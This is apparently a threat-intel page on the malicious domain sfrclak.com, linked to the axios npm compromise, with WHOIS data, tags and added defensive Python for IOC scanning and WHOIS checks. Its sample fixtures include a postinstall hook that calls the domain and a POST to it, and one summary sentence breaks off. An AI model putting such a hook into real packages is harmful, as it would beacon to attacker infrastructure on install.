Domain · Medium · Signal 90/100
sfrclak.com
Location: (none recorded)
First Seen: Mar 31, 2026
Last Seen: Jun 9, 2026
Found in 16 reports. Confidence: medium. · Confidence scores are heuristic. Verify before acting on results.
Type: Domain Name
Description: Malicious domain used for C2, phishing, or malware distribution.
MISP Category: Network Activity
Confidence: 90%
Signal Score: 90 / 100
IDS Rule: No
Feed Intelligence Summary: 16 source reports, 90% confidence score
Category tags (as carried by the source feeds, one run of tags split into a comma-separated list): abuse, abusech-threatfox-c2, c, accept, active scan, alienvault_ransomware, ansi, api key, apt, apt38, attack, axios, axios library, axios package, axios-npm, bad reputation, block-or-filter-list, bluenoroff, brute force, c2, c2 domain, c2 ip, c2 post, c2 server, c2 suspected, c2 url, ci/cd pipelines, cicd, ck id, click, click-based attack, close, code injection, command & control, command execution, communication protocol, comspec, contact, contacted hosts, copy, credential compromise, credential stuffing, credential-stealer, credential-theft, cross-platform, cross-platform rat, cryptocurrency, csa-260455, data access, data copying, data exfiltration, data store exposure, data transfer, data-exfiltration, data-extortion, dependency poisoning, dest, developer environments, dprk, dprk attribution, enom, enumeration, exploitation activity, factory, family notes, famous chollima, file, finance and insurance, flag, gecko, github actions, hostile, hosts, http, http scanner, hybrid, hybrid analysis, identity & access exploitation, indicator, information technology, infostealer, ingress tool transfer, injection activity, input validation bypass, install, iocs, iocs domains, iot security, it - security, it infrastructure, javascript trojan, kics, kimsuky, linux, linux python, local, macos, malicious activity, malicious download, malicious links, malicious powershell activity, malicious software, malware, malware distribution, mitre att, mobile threat, model, monitor, mozi, name server, nation-state activity, native binary, network, north america, npm, npm hijacking, npm package compromise, npm supplychain, online, operating system, os version, path, path traversal, pcap, pcap processing, phishing, plain-crypto-js, please, please note, post body, post-install execution, postinstall script, powershell, prefetch8 ansi, process injection, python, ransomware, rat, rat deployment, refresh, remote access, remote access trojan, remote-access-trojan, report, report domain, researched, retail trade, returns, risk detection, rotate npm, runtime process, sandbox, scripting attacks, security operations, server, shinyhunters, show process, silkbell na, social engineering, software development, stage, stardust chollima, strings, submit, supply chain, supply chain attack, supply chain compromises, supply-chain, temp, threat actor, threat intelligence, threat level, tor node, trojan, trojan malware, truesec, type, unc1069, unc6661, united, united states, urls, us, user execution, verify, vetting process, vishing, waveshaper overlap, waveshaper.v2, web application attack, web application exploitation, web exploitation, web traffic, window, windows, write, yara

MITRE ATT&CK technique tags: T1003, T1005, T1007, T1021, T1021.001, T1027, T1030, T1033, T1036, T1036.004, T1041, T1055, T1056, T1057, T1059, T1059.001, T1059.002, T1059.003, T1059.004, T1059.005, T1059.006, T1059.007, T1069.001, T1070.004, T1071.001, T1078, T1082, T1083, T1086, T1090, T1095, T1098, T1102.002, T1104, T1105, T1134, T1136, T1140, T1143, T1190, T1195, T1195.001, T1195.002, T1204.001, T1204.002, T1213, T1219, T1486, T1499.002, T1505.003, T1543, T1546.016, T1547.001, T1552.001, T1565, T1566, T1567, T1587.001
Activity Timeline: Jun 9 (single dated sighting)
Threat Activity Heatmap: peak 2026-06-09
Sightings by window: 24h: 0 (dormant) · 7d: 1 (minimal) · 30d: 1 (minimal) · 3mo: 1 (minimal)
Intelligence Summary (AI generated)
The domain sfrclak.com is an indicator of compromise (IOC) that appears in 16 threat reports. The tags and references on this page tie it to the March 2026 compromise of the axios npm package, which several of the referenced write-ups attribute to DPRK-linked actors (Stardust Chollima, TA444/Bluenoroff, UNC1069). First observed on March
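The page's own advice is to verify before acting on the heuristic score, and the first verification an analyst runs is a search of their own telemetry. The following is an added example, not code from this page or from any of the referenced vendors: it extracts exact-domain and subdomain matches for sfrclak.com from DNS and proxy log lines and from npm lifecycle scripts in a package.json (the tags mention a postinstall script), while ignoring look-alikes such as notsfrclak.com or sfrclak.com.evil.example that a naive substring search would flag. The log formats, the package.json and every sample line are constructed for illustration and are not real telemetry.

```python
"""Added example (not from the threat-intel page or any referenced vendor
report): find references to the sfrclak.com indicator in DNS/proxy log lines
and in npm lifecycle scripts, matching the domain and its subdomains only.

Assumptions: log formats, the package.json and every sample line below are
constructed for illustration and are not real telemetry.
"""
import re

IOC_DOMAIN = "sfrclak.com"  # the indicator on this page

# Match the IOC or any subdomain of it as a whole hostname:
#  - lookbehind rejects a preceding label character ("notsfrclak.com")
#  - optional trailing dot tolerates DNS-log FQDNs ("sfrclak.com.")
#  - lookahead rejects a following label ("sfrclak.com.evil.example")
_IOC_RE = re.compile(
    r"(?<![a-z0-9.-])((?:[a-z0-9-]+\.)*" + re.escape(IOC_DOMAIN) + r")\.?(?![a-z0-9.-])",
    re.IGNORECASE,
)


def matches_ioc(host: str) -> bool:
    """Exact or subdomain match, case-insensitive, trailing dot ignored."""
    h = host.lower().rstrip(".")
    return h == IOC_DOMAIN or h.endswith("." + IOC_DOMAIN)


def find_ioc_hosts(text: str) -> list:
    """All hostnames in `text` that are the IOC or a subdomain of it."""
    return [m.group(1).lower() for m in _IOC_RE.finditer(text)]


def scan_lines(lines) -> list:
    """(1-based line number, matched host) for each line referencing the IOC."""
    return [(n, h) for n, line in enumerate(lines, 1) for h in find_ioc_hosts(line)]


# npm lifecycle scripts that run automatically on `npm install`
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "preprepare", "postprepare")


def scan_package_scripts(pkg: dict) -> list:
    """(script name, host) for npm lifecycle scripts that reference the IOC."""
    scripts = pkg.get("scripts", {})
    return [(name, h) for name in LIFECYCLE if name in scripts
            for h in find_ioc_hosts(scripts[name])]


# --- constructed sample inputs (not real logs) ---
SAMPLE_DNS_LOG = [
    "09-Jun-2026 10:15:01.000 client 10.0.4.23#51234: query: api.sfrclak.com. IN A +",
    "09-Jun-2026 10:15:02.000 client 10.0.4.23#51236: query: registry.npmjs.org. IN A +",
    "09-Jun-2026 10:15:03.000 client 10.0.4.23#51237: query: notsfrclak.com. IN A +",
    "09-Jun-2026 10:15:04.000 client 10.0.4.24#51240: query: sfrclak.com.evil.example. IN A +",
]
SAMPLE_PROXY_LOG = [
    '10.0.4.23 - - [09/Jun/2026:10:15:05 +0000] "POST https://sfrclak.com/upload HTTP/1.1" 200 512',
    '10.0.4.25 - - [09/Jun/2026:10:15:06 +0000] "GET https://registry.npmjs.org/axios HTTP/1.1" 200 7310',
]
SAMPLE_PACKAGE_JSON = {
    "name": "demo-app",
    "scripts": {
        "build": "tsc",
        "postinstall": "node -e \"require('https').get('https://SFRCLAK.com/x')\"",
    },
}

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_DNS_LOG) + scan_lines(SAMPLE_PROXY_LOG):
        print("log hit:", hit)
    for hit in scan_package_scripts(SAMPLE_PACKAGE_JSON):
        print("lifecycle script hit:", hit)
```

Only the first DNS line and the first proxy line match; the look-alike and the suffix-appended variant are rejected by the anchoring around the hostname, and the postinstall hook is caught despite its mixed-case spelling. The same `find_ioc_hosts` can be pointed at any text (bundled JavaScript, lockfiles, Zeek dns.log) without changing the matcher.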
Threat Score: 90 (High Risk) · Signal Score: 90 / 100 · Confidence: 90% · Reports: 16 · First seen: Mar 31, 2026 · Last seen: Jun 9, 2026
VirusTotal: not checked
WHOIS
- registrar: NAMECHEAP INC
- domain rank: -1 (sentinel value: the domain has no entry in the enrichment source's popularity ranking)
- raw (one field per line; fields repeated with identical values, and the 0001-01-01 null placeholder for Updated Date, collapsed):
  Domain Name: SFRCLAK.COM
  Registry Domain ID: 3082352565_DOMAIN_COM-VRSN
  Registrar: NameCheap, Inc. (NAMECHEAP INC)
  Registrar IANA ID: 1068
  Registrar URL: http://www.namecheap.com
  Registrar WHOIS Server: whois.namecheap.com
  Registrar Abuse Contact Email: [email protected]
  Registrar Abuse Contact Phone: +1.6613102107, +1.9854014545
  Creation Date: 2026-03-30T16:03:46Z
  Updated Date: 2026-03-30T16:03:53Z
  Registrar Registration Expiration Date: 2027-03-30T16:03:46Z
  Registry Expiry Date: 2027-03-30T16:03:46Z
  Domain Status: addPeriod https://icann.org/epp#addPeriod
  Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  Name Server: dns1.registrar-servers.com
  Name Server: dns2.registrar-servers.com
  DNSSEC: unsigned
  Registrant Name: 37bfbc24cafea5d2
  Registrant Organization: 4b7a0912c26a13e2
  Registrant Street: c6523241936df1ba
  Registrant City: ddbf76e4e8cee320
  Registrant State/Province: 3e0204199d8ebf9c
  Registrant Postal Code: f206c9d9737ad45d
  Registrant Country: IS
  Registrant Phone: 1c9a7bcdeaf95e9f
  Registrant Phone Ext: 3432650ec337c945
  Registrant Fax: 3432650ec337c945
  Registrant Fax Ext: 3432650ec337c945
  Registrant Email: [email protected]
  Admin Organization: Privacy service provided by Withheld for Privacy ehf
  Admin City: Reykjavik
  Admin State/Province: Capital Region
  Admin Postal Code: 101
  Admin Country: IS
  Admin Email: [email protected]
  Tech Organization: Privacy service provided by Withheld for Privacy ehf
  Tech City: Reykjavik
  Tech State/Province: Capital Region
  Tech Postal Code: 101
  Tech Country: IS
  Tech Email: [email protected]
  Note for analysts: the domain was created on 2026-03-30, one day before its first sighting on this page, was still in the registry addPeriod grace period at lookup time, is registered behind a privacy proxy with registrant fields reduced to opaque 16-character hex tokens, and has no DNSSEC; none of that proves malice on its own, but the combination is typical of throwaway attacker infrastructure and is worth weighing alongside the report count.
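The checks an analyst would run over this WHOIS record before acting on the indicator, written out as an added example that is not part of the page or of any enrichment vendor's tooling: parse the line-oriented registrar output, collapse duplicated fields, and derive domain age at first sighting plus the other cheap signals (privacy-proxy registration, hash-redacted registrant fields, EPP addPeriod status, DNSSEC). The input is the relevant subset of the page's own record re-split one field per line, and the first-seen date is the page's Mar 31, 2026; the 7-day age threshold and the 16-hex-character redaction pattern are this example's own assumptions.

```python
"""Added example (not from the page or any referenced vendor report): parse a
raw WHOIS record and derive the enrichment checks an analyst wants before
acting on a domain IOC.

The record below is the relevant subset of the page's own WHOIS output,
re-split one field per line (registrar WHOIS is line-oriented; the page
flattens it). The 7-day threshold and the 16-hex redaction pattern are
assumptions of this example.
"""
from datetime import date, datetime
import re

RAW_WHOIS = """\
Domain Name: SFRCLAK.COM
Registry Domain ID: 3082352565_DOMAIN_COM-VRSN
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Creation Date: 2026-03-30T16:03:46Z
Updated Date: 2026-03-30T16:03:53Z
Registry Expiry Date: 2027-03-30T16:03:46Z
Domain Status: addPeriod https://icann.org/epp#addPeriod
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
Registrant Name: 37bfbc24cafea5d2
Registrant Organization: 4b7a0912c26a13e2
Registrant Country: IS
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin City: Reykjavik
Admin Country: IS
"""

FIRST_SEEN = date(2026, 3, 31)  # "First Seen" on the page

# Redacted registrant fields on this record are 16 lowercase hex characters
HEX16 = re.compile(r"^[0-9a-f]{16}$")
YOUNG_DOMAIN_DAYS = 7  # assumption: registered within a week of first sighting


def parse_whois(raw: str) -> dict:
    """Field name -> list of values; repeated values (case-insensitive) collapsed."""
    rec = {}
    for line in raw.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        seen = {v.lower() for v in rec.get(key, [])}
        if value and value.lower() not in seen:
            rec.setdefault(key, []).append(value)
    return rec


def domain_age_days(rec: dict, first_seen: date) -> int:
    """Whole days between the registry creation date and the first sighting."""
    created = datetime.fromisoformat(rec["Creation Date"][0].replace("Z", "+00:00"))
    return (first_seen - created.date()).days


def whois_flags(rec: dict, first_seen: date) -> list:
    """Human-readable risk signals derived from the parsed record."""
    flags = []
    age = domain_age_days(rec, first_seen)
    if age <= YOUNG_DOMAIN_DAYS:
        flags.append(f"registered {age} day(s) before first sighting")
    if any(s.startswith("addPeriod") for s in rec.get("Domain Status", [])):
        flags.append("still in EPP addPeriod (registry add grace period)")
    orgs = rec.get("Admin Organization", []) + rec.get("Registrant Organization", [])
    if any("privacy" in v.lower() for v in orgs):
        flags.append("privacy-proxy registration")
    hashed = [k for k in rec if k.startswith("Registrant ")
              and all(HEX16.match(v) for v in rec[k])]
    if hashed:
        flags.append(f"{len(hashed)} registrant field(s) redacted as opaque hex tokens")
    if rec.get("DNSSEC", ["unsigned"])[0].lower() == "unsigned":
        flags.append("DNSSEC unsigned")
    return flags


if __name__ == "__main__":
    record = parse_whois(RAW_WHOIS)
    print("name servers:", record["Name Server"])
    print("age at first sighting (days):", domain_age_days(record, FIRST_SEEN))
    for flag in whois_flags(record, FIRST_SEEN):
        print("flag:", flag)
```

For this record the parser collapses the four name-server lines to two, reports a one-day gap between creation and first sighting, and raises all five flags. Each flag is a weak signal by itself; the point of computing them from the raw record rather than reading the vendor's score is that they stay verifiable when the score does not.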
- references:
  https://unit42.paloaltonetworks.com/axios-supply-chain-attack/
  https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
  https://www.sentinelone.com/blog/securing-the-supply-chain-how-sentinelones-ai-edr-stops-the-axios-attack-autonomously/
  https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package/
  https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all
  https://nsfocusglobal.com/axios-front-end-library-npm-supply-chain-poisoning-alert/
  https://www.wiz.io/blog/axios-npm-compromised-in-supply-chain-attack
  https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package
  https://ltna.com.au/cyber
  https://hybrid-analysis.com/sample/4549eed582050392e9cecd9b69f0d8d796fd5132e47a2e8161c4bf76ed176a9e/5e690fae4c892737e7365efe
  https://hybrid-analysis.com/sample/4549eed582050392e9cecd9b69f0d8d796fd5132e47a2e8161c4bf76ed176a9e/5f7728aa32edd97f433dbb02
  https://hybrid-analysis.com/sample/a7a080e1e8bbd8b71a897b4d8d9d549207c2931a5e416c4599fc5cf51fc357c6
  https://hybrid-analysis.com/sample/e05affb84f4d1e1f2fb5f0200d819ffa64e3bc17c9e9b56f46a910b1c08f95e4/69d48a496246d30efa004564
  https://www.truesec.com/hub/blog/malicious-axios-packages-npm-in-supply-chain-compromise
  https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
  https://www.derp.ca/research/axios-npm-supply-chain-rat/
  https://socket.dev/blog/axios-npm-package-compromised
  https://socradar.io/blog/axios-npm-supply-chain-attack-2026-ciso-guide/
  https://www.malwarebytes.com/blog/news/2026/03/axios-supply-chain-attack-chops-away-at-npm-trust
  https://www.crowdstrike.com/en-us/blog/stardust-chollima-likely-compromises-axios-npm-package/
  https://blog.nviso.eu/2026/04/03/the-axios-npm-supply-chain-incident-fake-dependency-real-backdoor/
  https://hunt.io/blog/axios-supply-chain-attack-ta444-bluenoroff
  https://www.zscaler.com/blogs/security-research/supply-chain-attacks-surge-march-2026
  https://blog.talosintelligence.com/axois-npm-supply-chain-incident/
  IOCs.2026.pdf
  https://x.com/skocherhan/status/2038818679500968303
  https://x.com/skocherhan/status/2038835902126911631
  https://x.com/skocherhan/status/2038835944975921553
  https://x.com/skocherhan/status/2038841954511851692
  https://x.com/skocherhan/status/2038846932651536633
  https://x.com/skocherhan/status/2038847155067101680
  https://x.com/skocherhan/status/2038847230610751909
  https://x.com/skocherhan/status/2038856176574640271
  https://x.com/skocherhan/status/2038856660479799517
  https://x.com/skocherhan/status/2038858417603858543
  https://x.com/skocherhan/status/2038879627490287762
  https://x.com/skocherhan/status/2038933211967799532
  https://x.com/skocherhan/status/2038933224492064829
  https://x.com/skocherhan/status/2039031536285020495
  https://x.com/skocherhan/status/2039032037785440536
  https://x.com/skocherhan/status/2039033058163081616
  https://x.com/skocherhan/status/2039049022321668098
  https://x.com/skocherhan/status/2039051912159338520
  https://x.com/skocherhan/status/2039073222650445939
  https://x.com/skocherhan/status/2039075319181611489
  https://x.com/skocherhan/status/2039076163088162984
  https://x.com/skocherhan/status/2039087968497901575
  https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan#indicators-of-compromise
- subdomains count: 0
IOC Journey: medium confidence · first detected Mar 31, 2026 · last seen Jun 9, 2026 · appeared in 16 threat reports